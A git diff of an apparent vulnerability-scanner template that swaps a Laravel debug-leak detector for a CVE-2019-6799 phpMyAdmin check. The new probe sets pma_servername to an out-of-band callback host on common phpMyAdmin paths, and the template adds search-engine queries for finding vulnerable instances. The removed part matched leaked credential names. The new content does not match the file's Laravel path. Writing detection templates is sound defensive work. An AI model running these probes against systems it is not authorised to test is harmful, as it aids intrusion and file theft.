diff --git a/vulnerabilities/laravel/laravel-debug-infoleak.yaml b/vulnerabilities/laravel/laravel-debug-infoleak.yaml index 3d705e810f..49aaa8f2b1 100644 --- a/vulnerabilities/laravel/laravel-debug-infoleak.yaml +++ b/vulnerabilities/laravel/laravel-debug-infoleak.yaml @@ -1,44 +1,89 @@ -id: laravel-debug-infoleak +id: CVE-2019-6799 info: - name: Laravel-Debug-Infoleak + name: CVE-2019-6799 author: pwnhxl severity: high - description: Laravel-Debug-Infoleak + description: An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of "options(MYSQLI_OPT_LOCAL_INFILE" calls. reference: - - https://nosec.org/home/detail/3059.html + - https://paper.seebug.org/1112/#_4 + - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799 + - https://nvd.nist.gov/vuln/detail/CVE-2019-6799 + - https://github.com/rmb122/rogue_mysql_server + - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver metadata: verified: "true" - fofa-query: app="Laravel-Framework" - tags: laravel,debug,infoleak + shodan-query: title:"phpmyadmin" + hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" + fofa-query: body="pma_servername" && body="4.8.4" + tags: phpmyadmin,mysql,fileread requests: - raw: - | - POST / HTTP/1.1 + GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1 Host: {{Hostname}} + payloads: + path: + - "/index.php" + - "/pma/index.php" + - "/pmd/index.php" + - "/phpMyAdmin/index.php" + - "/phpmyadmin/index.php" + - "/_phpmyadmin/index.php" + attack: batteringram + + extractors: + - type: regex + name: version + internal: true + group: 1 + regex: + - '\?v=([0-9.]+)' + + - type: regex + group: 1 + regex: + - '\?v=([0-9.]+)' + + - type: regex + name: phpversion + part: header + internal: true + group: 1 + regex: + - "X-Powered-By: PHP/([0-9.]+)" + + stop-at-first-match: true matchers-condition: and matchers: - type: word - part: body + part: interactsh_protocol words: - - 'vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php' - - 'MethodNotAllowedHttpException' - condition: and + - "dns" - type: word - part: body words: - - 'DB_PASSWORD' - - 'REDIS_PASSWORD' - - 'MAIL_PASSWORD' - - 'ALIYUN_ACCESSKEYSECRET' - - 'ALIYUN_ACCESSKEYID' - - 'SMS_AUTH_TOKEN' - - 'APP_KEY' - condition: or + - "mysqli_real_connect" + + - type: word + words: + - "pma_servername" + + - type: dsl + dsl: + - compare_versions(version, '< 4.8.5') + + - type: dsl + dsl: + - compare_versions(version, '> 3.9.9') + + - type: dsl + dsl: + - compare_versions(phpversion, '< 7.3.4') - type: status status: - - 405 \ No newline at end of file + - 200